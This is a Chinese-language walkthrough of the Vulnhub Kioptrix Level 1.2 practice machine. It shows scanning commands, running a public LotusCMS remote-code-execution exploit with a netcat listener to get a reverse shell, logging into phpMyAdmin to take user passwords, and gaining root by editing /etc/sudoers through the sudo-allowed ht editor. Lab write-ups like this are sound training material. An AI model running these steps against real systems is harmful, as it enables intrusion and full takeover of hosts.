Vulnhub靶机系列：Kioptrix: Level 1.2 (#3)

这次的靶机是Vulnhub靶机：Kioptrix: Level 1.2 (#3)

靶机地址及相关描述

https://www.vulnhub.com/entry/kioptrix-level-12-3,24/

靶机设置

老规矩，开启虚拟机前分配一个和攻击机一样的网卡，选择我已移动该虚拟机；开启虚拟机后，netdiscover确认一下目标，我的靶机ip为192.168.190.189
靶机描述里还要配置host指向kioptrix3.com

vim /etc/hosts

利用知识及工具

信息收集并getshell

先看首页差不多这个样子，架构也知道了，是php+apache+mysql+ubuntu

blog页面评论区写一句话失败

除此之外还有个登录页面

dirb扫下目录dirb http://192.168.190.189
基本可以知道数据库是mysql
whatweb扫下cmswhatweb -vv 192.168.190.189
其实刚才的登录页面也可以知道这点
搜索LotusCMS的漏洞searchsploit LotusCMS

好像有msf的exp,既然有，那么就可能存在其他的exp，GitHub搜索找到了这个
https://github.com/vj0shii/LotusCMS-3.0-eval-Exploit-Shell
好吧，这个不行，但是我还找到另一个https://github.com/Hood3dRob1n/LotusCMS-Exploit

git clone https://github.com/Hood3dRob1n/LotusCMS-Exploit
cd LotusCMS-Exploit/
chmod 777 lotusRCE.sh
nc -lvp <port>
./lotusRCE.sh 192.168.190.189
<你的ip>
<刚才的port>
1

tip:用之前读下用法

可以看到已经拿到shell了，不过权限有点低,www的权限

提权

上面拿到了shell，但是权限非常低,我在尝试python一个交互式shell都失败了.
甚至我在目录下面创建文件都失败了，回想上面有个phpmyadmin，所以尝试利用mysql的权限
寻找了很久

在phpmyadmin界面登录，成功进入了

看数据

发现这两个用户权限好像很高，chamd5,ssh登入

很尴尬，权限还是不够高，看下sudo有谁

loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht

发现ht也有sudo权限，搜了下ht是啥，发现是款编辑器，那不就是说我们用ht编辑东西时候权限就是root;这里还有个坑，不能直接打开ht

export TERM=xterm-color
sudo /usr/local/bin/ht
f3
/etc/sudoers

在你登进来的账户后加,/bin/bash
f2保存退出

sudo /bin/bash

确认权限id

总结

u1s1 ht这编辑器太老了，学用它学了很久，主要是思想上一时半会转不过来